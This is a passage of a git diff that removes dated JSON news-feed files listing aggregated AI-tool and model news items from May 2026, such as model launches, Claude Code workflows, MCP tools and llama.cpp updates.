Ollama's VRAM-aware default num\\_ctx on this GPU is…", - "category": "ai_models" - }, - { - "title": "bytedance released an open source model that attempts to do just about anything with only 3b parameters", - "url": "https://reddit.com/r/LocalLLaMA/comments/1thkwgk/bytedance_released_an_open_source_model_that/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-19T12:05:26.000Z", - "summary": "Lance is a lightweight native unified multimodal model that supports **image and video understanding, generation, and editing** within a single framework. * **Efficient at 3B scale.** With only **3B active parameters**, Lance delivers strong performance across image generation, image editing, and video generation benchmarks. * **Trained from scratch.** Lance is built with a staged multi-task recipe and trained entirely from scratch within a **128-A100-GPU** budget.", - "category": "ai_models" - }, - { - "title": "How I built a 9-agent team where my agents actually talk to each other", - "url": "https://reddit.com/r/ClaudeAI/comments/1thi16y/how_i_built_a_9agent_team_where_my_agents/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-19T09:50:18.000Z", - "summary": "I've been running Claude Code for 6 months, shipping my product and running content/launch ops for it. The thing that kept breaking wasn't the agents themselves. It was me. Every handoff between research and write and code and review was me copy pasting context between sessions. I was the dispatcher and context holder for my own AI team Tried gstack first. The roles are great but I'm still the one cycling through slash commands. /office-hours → /plan-eng-review → /review → /ship. Good output, but I'm orchestrating every step Spent a weekend porting my workflow over. 
Here's the lineup: **Engineering (4 agents)** * arch: owns architectural decisions. Reviews proposed changes before code starts. Soul: \"senior staff engineer, asks 'what breaks at 10x' before approving anything * backend: owns /api, /services. Implements after arch greenlights * frontend: owns /web. Picks up from backend when API contracts are stable * review: reads every PR before I do. Catches the lazy stuff so I only review substantive changes **Growth/Content (5 agents)** * research: uses ahrefs MCP to analyse keywords/opportunities/market and hands off to strategist * strategist: reads research, writes campaign br…", - "category": "ai_tools" - }, - { - "title": "We have sub-agents at home", - "url": "https://reddit.com/r/LocalLLaMA/comments/1th8a43/we_have_subagents_at_home/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-19T01:38:42.000Z", - "summary": "At work I get unfettered access to gpt 5.4 and sonnet, so I'm quite used to spawning sub-agents to go crazy on a repo and split up tasks. At home I am VRAM poor and like to run the models locally for my own enjoyment. Almost every single sub-agent extension/implementation does not account for any of the restrictions imposed by having 10gb of VRAM and a single slot for a KV cache (thats already quantized). I already work as a developer, so I qwen3.6-35b-a3b tagged teamed a partially vibe-coded fork of an existing sub-agent repository for pi coding agent. This is really only relevant if you: * Use pi coding agent as your harness * Can only run a single LLM at a time with 1 slot via llama.cpp server * Want to use sub-agents without fully reprocessing your prompts after the sub-agent is done Repo is [here](https://github.com/BenjaminBilbro/pi-subagent), feel free to use it or fork it idc. 
I am also interested in how others around here have dealt with sub-agents on a purely local and VRAM constrained setup. I was also planning to add the ability for sub-agents to be spawned with no previous context, and manage the saving and storing the main context via \\`--slot-save-path\\` and the \\`s…", - "category": "ai_models" - }, - { - "title": "Glia – Local-first shared memory layer (SQLite-vec + FTS5 + Offline Knowledge Graph)", - "url": "https://reddit.com/r/ChatGPT/comments/1ther0u/glia_localfirst_shared_memory_layer_sqlitevec/", - "source": "Reddit r/ChatGPT", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-05-19T06:46:11.000Z", - "summary": "Hey everyone, I wanted to share a project I've been working on called Glia. It is a 100% offline, local-first RAG and memory layer designed to connect your AI web chats (Claude, ChatGPT, DeepSeek) with your local developer tools (Claude Code, Cursor, Windsurf) using a unified local database. I wanted something lightweight that did not require pulling heavy Docker containers or subscribing to third-party memory APIs. I settled on a Node.js + SQLite architecture running sqlite-vec (for 768-dim float32 embeddings) alongside SQLite FTS5 for hybrid search, powered completely by local Ollama instances. We just launched a live website that outlines the details and demonstrates the features in action: * Website: [https://glia-ai.vercel.app/](https://glia-ai.vercel.app/) * Codebase: [https://github.com/Eshaan-Nair/Glia-AI](https://github.com/Eshaan-Nair/Glia-AI) Technical Stack & Features: * Hybrid Search Retrieval: SQLite-vec (using nomic-embed-text locally) + FTS5 keyword prefix matching (porter stemmer). * Surgical Sentence-level Trimming: Chunks are sliced into sentences. 
When a prompt is intercepted, only the exact matching sentences are pulled out of the vector store instead of t…", - "category": "ai_tools" - }, - { - "title": "Centralize SKILLs", - "url": "https://reddit.com/r/ClaudeAI/comments/1thc7pg/centralize_skills/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-19T04:35:20.000Z", - "summary": "We recently tried to roll out an AI agent workflow across a 60-person company, and we found out 1. need to centralize the SKILLs files 2. update, versioning markdown file supporting multi users is a challenge Does Claude enterprise version offer any solution? or there are any open source project helping company to manage skills ? Since these are just text files, we could hack together a workaround using SharePoint to distribute them internally. But are there any actual purpose-built tools for this?", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-20.json b/data/news-feed-2026-05-20.json deleted file mode 100644 index d7cf033..0000000 --- a/data/news-feed-2026-05-20.json +++ /dev/null @@ -1,261 +0,0 @@ -{ - "generated": "2026-06-05T00:44:41.365Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-20", - "article_count": 15, - "archived_story_count": 630, - "articles": [ - { - "title": "Antigravity unifies its agentic surfaces under a single platform incorporating Antigravity 2.0 desktop app, CLI, SDK, and IDE for consistent access across environments", - "url": "https://www.digg.com/ai/xizlma81", - "source": "Digg AI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-20T06:02:26.989Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Put your spare Claude 
cycles on night shift: help review open-source packages", - "url": "https://reddit.com/r/ClaudeAI/comments/1tizbag/put_your_spare_claude_cycles_on_night_shift_help/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-20T21:15:12.000Z", - "summary": "Hello, I’m building Thirdpass, a tool/service for coordinating collaborative package review to reduce software supply-chain risk. The basic idea: there are far too many packages for humans to manually review, but lots of us now have AI coding agents sitting around with spare capacity. Thirdpass tries to turn that into useful coverage by assigning packages/files to review, collecting the results, and cross ref against local project dependencies. It currently supports packages from: - crates.io - PyPI - npm - Ansible Galaxy I added a “night shift” mode, so you can point Claude at the shared review backlog and let it work through package reviews continuously: ``` thirdpass review-any --nightshift ``` The reviews are first-pass supply-chain reviews: suspicious install scripts, unexpected network behavior, credential handling, sketchy build steps, weird package metadata, and so on. Partial coverage still helps. I’m looking for people who want to: - run the CLI and donate spare Claude tokens to secure OSS - improve the review prompts/agent workflow - build more registry extensions I started this project years ago after thinking a lot about `cargo-crev` and collaborative review. My curre…", - "category": "ai_tools" - }, - { - "title": "Re. 
what ever happened to Cohere’s Command-A series of models?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tizmar/re_what_ever_happened_to_coheres_commanda_series/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-20T21:25:50.000Z", - "summary": "Hey everyone, Nick Frosst here from Cohere. A few months ago Aidan (my cofounder) [left a comment](https://www.reddit.com/r/LocalLLaMA/comments/1rf8nou/comment/o8rkdrf/) in here about our Command series and how we were working on some more powerful, open-weights models behind the scenes. We just launched Command A+ and we wanted to share it with you guys. TLDR is we built a really efficient model. It’s our first MoE model, which is exciting. There’s obvs work to do on top-line performance but it’s easily looking like one of the fastest and most responsive models in our category. We also pulled off some incredible quantization work so it runs really well on even 1 or 2 GPUs. Like with R7B, we really prioritized making the model practical, so smaller teams and devs could realistically use it to build the kind of agents we ship for our platform customers. That’s also why it’s under Apache 2.0. Just total, near unfettered access to a pretty awesome model. We’re enterprise-first but honestly, we get so much out of our open-source community that makes us more innovative and creative. 
The feedback you give will almost certainly influence how we think about models and product going forwar…", - "category": "ai_models" - }, - { - "title": "Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software — The launch targets developers and organizations with constrained compute resources.", - "url": "https://www.digg.com/ai/tvrhpn35?rank=1", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-20T18:00:28.460Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software", - "url": "https://www.digg.com/ai/tvrhpn35", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-20T18:00:28.444Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Gemini 3.5 Flash Benchmarks Change The Workhorse Model Race", - "url": "https://x.com/koraykv/status/2056795667088204234", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-19T23:32:37.527Z", - "summary": "Gemini 3.5 Flash launched with strong numbers on agentic, coding, ARC AGI, and speed focused benchmarks.", - "category": "ai_tools" - }, - { - "title": "Remove-AI-Watermarks – CLI and library for removing AI watermarks from images", - "url": "https://github.com/wiltodelta/remove-ai-watermarks", - "source": "Hacker News", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - 
"cli_tool" - ], - "importance": 0.88, - "date": "2026-05-19T22:30:31.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Seven questions decide whether your AI agent ships. Most teams can answer two.", - "url": "https://natesnewsletter.substack.com/p/agent-infrastructure-control-layer", - "source": "Nate's Newsletter", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 0.82, - "date": "2026-05-20T18:00:37.499Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "open source Gemini CLI", - "url": "https://github.com/google-gemini/gemini-cli", - "source": "Simon Willison's Blog", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.74, - "date": "2026-05-20T18:00:39.277Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Antigravity SDK", - "url": "https://github.com/google-antigravity/antigravity-sdk-python", - "source": "Simon Willison's Blog", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.74, - "date": "2026-05-20T18:00:39.270Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "After a year in Claude Code, the thing slowing me down turned out to be me", - "url": "https://reddit.com/r/ClaudeAI/comments/1ti8cwr/after_a_year_in_claude_code_the_thing_slowing_me/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-05-20T02:31:50.000Z", - "summary": "I have used Claude Code daily for about a year. I kept assuming the way to get faster was a better model or a sharper prompt. It was neither. The slow part was me, and I had stopped noticing. 
There is an old xkcd (#1205, \"Is It Worth the Time?\") that charts how long you can spend automating a task before the automation costs more than it saves. It assumes the expensive part of automating is you, sitting down to build the thing. That assumption is dead. An agent writes the script in the time it takes to describe it. So almost everything is worth automating now, and the only real skill left is noticing what to automate. It sorted into four categories for me. Each one has a \"tell,\" a thing you catch yourself doing: - Connect: you're copy-pasting between tools, alt-tabbing, ferrying data by hand. Fix is an MCP server or a CLI so the agent reaches the source itself. - Encode: you're running the same sequence of steps again. Fix is a script or a skill. - Teach: you're typing the same instructions or context again. Fix is putting it in CLAUDE.md or a skill. - Parallelize: you're sitting and watching one agent work. Fix is running several. The last one was the big one. When an agent is ge…", - "category": "ai_tools" - }, - { - "title": "Stability AI releases a new audio model that can create 6-minute songs", - "url": "https://techcrunch.com/2026/05/20/stability-ai-release-a-new-audio-model-that-can-create-six-minute-songs/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-20T18:00:30.801Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Exa raised $250 million in a Series C at a $2.2 billion valuation led by Andreessen Horowitz, reporting 400,000 developers and 5,000 company adopters for its AI agent search platform — Token usage grew 20x for agent-driven queries.", - "url": "https://www.digg.com/ai/1te0bqvt?rank=2", - "source": "Digg AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-20T18:00:28.463Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "AI server 
under 5k?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tirzfm/ai_server_under_5k/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-20T17:06:50.000Z", - "summary": "I have a framework desktop 128GB and a 3080 12GB running qwen 7b I want to move to a proper server rack + switch but not sure how to move from desktop PC to server rack. Any advice on what GPU/Server to get under 5k? Or at that price just stick to workstation?", - "category": "ai_models" - }, - { - "title": "under 2% quality gap but 10x cost difference: tested 5 models on identical tool calling tasks[D]", - "url": "https://reddit.com/r/MachineLearning/comments/1tiqsao/under_2_quality_gap_but_10x_cost_difference/", - "source": "Reddit r/MachineLearning", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-20T16:25:46.000Z", - "summary": "I've been running a file management agent built on MCP for a few months. It handles module renames, import updates, validation scaffolding, test execution. A typical session is 60 to 120 tool calls. The whole thing was powered by Opus 4.7 because I never thought to question it until I looked at my April bill. So I set up a comparison. Eight refactoring tasks on a 15k line Python project, same MCP tools, same system prompt, same repo state, five models. Tasks were things like \"rename this module and fix all imports\" and \"add input validation to these 12 endpoints.\" Routine cleanup, nothing requiring deep architectural thought. The metric I cared about was first attempt tool call success: did the model produce a valid function call that executed without a parse error on the first try? On the expensive end, Opus 4.7 hit roughly 98 to 99 percent across a bit over 500 calls and cost close to $15 for all eight tasks. GPT 5 was similar quality for around $11. The cheaper tier surprised me. 
Sonnet 4.6 landed somewhere around 96 percent for about $4. DeepSeek V4 Pro was in the same neighborhood for under $2. And Tencent Hunyuan Hy3 preview came in within a couple of points of Opus for unde…", - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-21.json b/data/news-feed-2026-05-21.json deleted file mode 100644 index 0e17d42..0000000 --- a/data/news-feed-2026-05-21.json +++ /dev/null @@ -1,277 +0,0 @@ -{ - "generated": "2026-06-05T00:44:42.106Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-21", - "article_count": 15, - "archived_story_count": 634, - "articles": [ - { - "title": "Anthropic officially launched 13+ FREE AI courses with certificates (Including Agentic AI and Claude Code!)", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjpfh8/anthropic_officially_launched_13_free_ai_courses/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool", - "cli_tool", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-21T16:16:09.000Z", - "summary": "Just found out about this and had to share because almost nobody is talking about it yet. If you are tired of paying for AI courses or getting hit with paywalls just to get a certificate, Anthropic (the creators of Claude) quietly dropped a massive library of completely free, official training modules. Yes, they actually give you an official certificate of completion directly from Anthropic once you finish. Here is the breakdown of what is available and exactly how to get it without spending a dime. What is in the course catalog? They have split the training into a few different paths depending on what you want to do: * **The Big Surprise: Agentic AI & MCP:** They have official courses on the Model Context Protocol (MCP). 
This is the cutting-edge tech used to build AI Agents that can browse your local computer, use tools, and execute tasks autonomously. * **Claude Code 101:** Dedicated developer modules for their new command-line agent. It teaches you how to let Claude edit your codebase, run tests, and use its new \"Plan Mode.\" * **API & Cloud Architecture:** Deep dives into building with the Claude API, plus corporate tracks for deploying Claude securely inside Amazon Bed…", - "category": "ai_tools" - }, - { - "title": "Qwen releases Qwen3.7-Max, its latest flagship model for agent workloads that achieves 69.7 on Terminal-Bench 2.0 and completed a 35-hour kernel optimization with over 1,000 tool calls — Supports multi-file coding agents, MCP integrations, and multi-agent orchestration.", - "url": "https://www.digg.com/ai/5rbia2h1?rank=4", - "source": "Digg AI", - "tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-21T18:00:16.708Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "I built a zero-code visual client to test remote MCP servers instantly (Tested with Cloudflare’s free MCP).", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjpzfg/i_built_a_zerocode_visual_client_to_test_remote/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-21T16:34:53.000Z", - "summary": "Hey everyone, The Model Context Protocol (MCP) is amazing for standardizing how agents talk to data, but I got incredibly frustrated every time I wanted to quickly test a new remote MCP server. Writing custom client-side boilerplate or wrestling with CLI tools just to see if a tool actually exposes the right schema is a massive time sink. So, I built a native MCP client directly into the visual canvas of **AgentSwarms**. 
You can now test any remote MCP server entirely in the browser without writing a single line of code. **Here is the workflow I just tested with Cloudflare:** Cloudflare released a free MCP server for their documentation. Instead of building a local client to test it: 1. I dropped their SSE URL into the new MCP Servers integration in AgentSwarms. 2. The canvas immediately connected and extracted the available tools (e.g., `cloudflare-docs-search`). 3. I wired that tool up to a basic agent and started asking complex infrastructure questions in natural language. The agent successfully used the MCP tool to pull live docs and synthesize an answer. **Why this is useful for AI devs:** If you are building your own MCP servers, you need a fast way to visually test if your…", - "category": "ai_tools" - }, - { - "title": "I did what Microsoft wouldn't - updated POML VS Code extension", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tjine7/i_did_what_microsoft_wouldnt_updated_poml_vs_code/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-21T12:14:07.000Z", - "summary": "**What's a POML?** Microsoft came up with this really cool HTML style mark-up language that allows you to make modular prompt templates, with all sorts of neat features like **local AI support via OpenAI API**, setting runtime parameters for your LLM, and embedding documents into the prompt. You could even send the prompt directly to your LLM via the VS Code extension. **What happened to it?** I don't fucking know. They supported it for 2-3 months, then ghosted when it didn't hit KPIs or something, I guess. Then a VS Code or dependency update exposed a bug in how they handled `/>`, which is actually **fairly common** in POML when you embed documents. 
This broke the ability to directly send prompts to the LLM - you could copy them out of the preview, but it was slower and less efficient. **What I did** I used [OpenCode](https://opencode.ai/) (which doesn't get enough play here - I only found out about it because someone posted a repo for an **extension** to it) and the [opencode-power-pack](https://github.com/waybarrios/opencode-power-pack) (said extension) to try to find the bug and update some of the more egregiously outdated dependencies. It took me a couple of days to get wo…", - "category": "ai_models" - }, - { - "title": "Show HN: Rmux – A programmable terminal multiplexer with a Playwright-style SDK", - "url": "https://github.com/helvesec/rmux", - "source": "Hacker News", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.82, - "date": "2026-05-21T09:22:00.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "I built Hivemind, a Claude Code plugin that turns your repeated prompts into auto-generated skills", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjw0ah/i_built_hivemind_a_claude_code_plugin_that_turns/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-21T19:57:22.000Z", - "summary": "Disclosure: I work on Hivemind. Per the subreddit rules, posting with a full description of what it is and how it works. **What it is** Hivemind is an open-source Claude Code plugin. It installs into Claude Code, watches the traces from your sessions, finds patterns you repeat, and crystallizes them into reusable skills that show up as native slash commands in Claude Code. Because it's a plugin and not an external tool, the skills it generates drop in as proper Claude Code slash commands. 
No external tool calls, no separate config files to maintain. **What it does in practice** Every morning for about a week, I was writing the same long prompt to Claude Code to pull together a team standup review. Same structure, same context blocks, slightly different details each day. I never thought to turn it into a custom slash command. Hivemind noticed the pattern and built `/team-standup` for me on its own. I didn't configure it or ask for it; it watched the repeats and crystallized the skill. Other slash commands it's built from my team's usage: an environment-aware database debugging command that knows our dev vs prod clusters and kubectl context, a PostHog SDK testing helper, a few other…", - "category": "ai_tools" - }, - { - "title": "LlamaStation v0.9 — llama.cpp GUI for Windows with multi-backend support, TurboQuant, MTP and more", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tjm58w/llamastation_v09_llamacpp_gui_for_windows_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-21T14:25:20.000Z", - "summary": "I've been building this for the past few months as a side project — started because I didn't want to run llama.cpp from the command line every time I wanted to try a model. I just wanted something that worked with a click. Fair warning: I'm not a developer. This is 100% vibe coded with AI assistance. If something in the codebase makes you cringe, please be kind and open a PR instead 🙏 Most frontends either hide everything behind abstractions (Ollama, LM Studio) or leave you writing command lines manually. LlamaStation tries to sit in the middle: a clean UI with full access to every parameter. What makes it different Runs llama-server directly — no intermediate layer, no daemon, no abstraction. LlamaStation launches llama-server.exe as a subprocess with full control over every flag. 
What you configure is exactly what gets passed to the binary. This means you get the full performance of llama.cpp with none of the overhead that tools like Ollama add on top. Multiple backends, switchable from the UI: ⚡ Official llama.cpp (with MTP support since PR #22673) 🔬 TurboQuant fork — asymmetric KV cache quantization. This is the killer feature for me: 200k+ context on 24GB VRAM (dual RTX 306…", - "category": "ai_models" - }, - { - "title": "'Am I OpenAI compatible' - a tool and documentation for unified api signatures in open source AI.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tjgceg/am_i_openai_compatible_a_tool_and_documentation/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-21T10:26:06.000Z", - "summary": "This has turned out to be useful to many of my friends so I thought I'd share here as well. I created a tool and documentation page for most major open-souce project's adherence to 'OpenAI compatibility' after seeing inconsistencies between engines like vLLM and llama.cpp. Now official and unofficial signatures are documented. Beyond that there are gaps for many model types, so there's also ht-compatibility (inherited from OpenAI compatibility for those) Just wanted to share a tool I made that can be useful if you're plugging and playing llm and other ai endpoints e.g. into an app. Also if you're making your own proxy / middleware or even your own API interface this tool with make you and your agents job way easier. Maybe I'll add Anthropic compatible and other signatures as optional extensions :) Would love feedback and or contributions! 
Github: [https://github.com/heiervang-technologies/am-i-openai-compatible](https://github.com/heiervang-technologies/am-i-openai-compatible) Readthedocs: [https://heiervang-technologies.github.io/am-i-openai-compatible/](https://heiervang-technologies.github.io/am-i-openai-compatible/) Feel free to star it! <3", - "category": "ai_models" - }, - { - "title": "Cohere releases Command A+, its most powerful large language model to date, as open-source Apache 2.0 software that runs on two H100 GPUs with 30% lower latency — Cohere co-founder Ivan Zhang highlighted efficiency and accessibility design choices.", - "url": "https://www.digg.com/ai/tvrhpn35?rank=2", - "source": "Digg AI", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-21T06:22:31.267Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "ggufy: easy quantization for the GPU poor", - "url": "https://reddit.com/r/StableDiffusion/comments/1tj5nhq/ggufy_easy_quantization_for_the_gpu_poor/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-21T01:29:38.000Z", - "summary": "Hello. I was frustrated by the lack of tooling around image model conversion / quantization, or the extreme RAM requirements and complexity of the scant existing tooling, so I wrote my own. People have said I should post it here, so here it is: https://github.com/qskousen/ggufy It has a CLI and a GUI. The GUI is easy to use, you can drag and drop files in. Both CLI and GUI are single-file executables, written in Zig because I like writing in Zig. It's pretty efficient with RAM, and takes about 1.5 minutes to quantize ZiT on my machine. It supports all the main models that I am aware of, and you can convert to/from gguf or safetensors. 
It supports I think all the datatypes that are generally supported, such as q3_k through q8_0, f32, bf16, f16, f8_e4m3, f8_e5m2, scaled fp8, mxfp8, and nvfp4. It doesn't do SDNQ yet, but I would like to add it if I can get some time to figure out the format. It's cross platform, and builds for Linux, Windows, and MacOS (both ARM64 and x86). Github Actions pre-built binaries are available on the releases page. If there are features you think are in scope and would be useful, or additional models or formats that it doesn't support yet, please open an i…", - "category": "creative_tools" - }, - { - "title": "i open-sourced the operating file that keeps my claude code agent from rotting after 3 hours", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjy3sk/i_opensourced_the_operating_file_that_keeps_my/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.62, - "date": "2026-05-21T21:12:51.000Z", - "summary": "been running autonomous claude code sessions for months. the pattern that kept killing me: agent starts sharp, drifts into narration by hour 2, loops on the same fix by hour 3, then dies with nothing shipped. the fix wasn't a framework or a new tool. it was one CLAUDE.md file that sits in the project root. claude code reads it at startup and it changes the behavior immediately. what it does: - forces action over narration. if the agent catches itself writing \"i will now\" instead of calling the tool, it stops and fires - requires evidence before claiming done. no \"should be fixed\" without test output - kills planning language. the only valid outputs are completed actions, questions, or summaries - self-audits on context pressure instead of silently degrading it's 70 lines. MIT licensed. you copy it into your project, agent reads it, behavior shifts. what changed for us: sessions went from 3-hour narration loops to full productive lifecycles. 
the agent ships code, verifies it landed, and keeps going until context pressure hits. then it saves state and the next session picks up clean. not a product pitch. genuinely sharing what worked after burning through hundreds of sessions figuri…", - "category": "ai_tools" - }, - { - "title": "Claude Code vs Codex Explained", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjp4sb/claude_code_vs_codex_explained/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-05-21T16:06:09.000Z", - "summary": "Wrote a blog post about Claude Code vs Codex comparison I wanted to read myself - what actually differs in daily use: cost, failure modes, and the OpenAI plugin that lets you use both. Link: [https://diamantai.substack.com/p/claude-code-vs-codex-cli](https://diamantai.substack.com/p/claude-code-vs-codex-cli)", - "category": "ai_tools" - }, - { - "title": "Latest b9274 Addresses MTP VRAM leak", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tk0grd/latest_b9274_addresses_mtp_vram_leak/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-21T22:43:05.000Z", - "summary": "[B9274](https://github.com/ggml-org/llama.cpp/releases) I have been having an issue with MTP models unloading after a couple minutes of use. Can't figure out why. Anyways z I don't think this is relevant to that but I did observe the vram creep so hopefully this helps. > server : free draft/MTP resources on sleep to fix VRAM leak ([\\#23461](https://github.com/ggml-org/llama.cpp/pull/23461)) The destroy() function in server\\_context\\_impl only cleaned up the main model and context (via llama\\_init.reset()) but did not free the speculative decoder (spec), draft context (ctx\\_dft), or draft model (model\\_dft). 
For MTP (Multi-Token Prediction) models, ctx\\_dft holds GPU-allocated resources (KV cache, compute buffers) that are not freed when entering the sleeping state. On each sleep/resume cycle, new resources are allocated without the old ones being freed, leading to a VRAM leak that eventually crashes the server with out-of-memory errors. Fix by explicitly resetting spec, ctx\\_dft, and model\\_dft in destroy() before resetting llama\\_init, ensuring proper cleanup order to avoid use-after-free.", - "category": "ai_models" - }, - { - "title": "Handoffs are becoming a first-class pattern in Claude workflows. Here is how I have been thinking about them.", - "url": "https://reddit.com/r/ClaudeAI/comments/1tjzqrx/handoffs_are_becoming_a_firstclass_pattern_in/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-21T22:14:24.000Z", - "summary": "Long Claude sessions still break on context decay. Handoffs are the simple fix: compress what matters, start a fresh agent, keep going. Matt Pocock's new `handoff` skill ([repo](https://github.com/mattpocock/skills/blob/main/skills/productivity/handoff/SKILL.md)) does this in one command. It compacts the conversation into a document, points at existing artifacts instead of restating them, and the next agent picks up from it. It also chains between threads: `/grill-with-docs -> /handoff -> /prototype -> /handoff back`. I built handoffs into [APM](https://github.com/sdi2200262/agentic-project-management), a multi-agent framework for Claude Code, back in May 2025 (1 year ago....) when context windows were tiny enough that you had to constantly start fresh or you would have to deal w hallucinations all the time. What I did differently: split the handoff into two artifacts. 
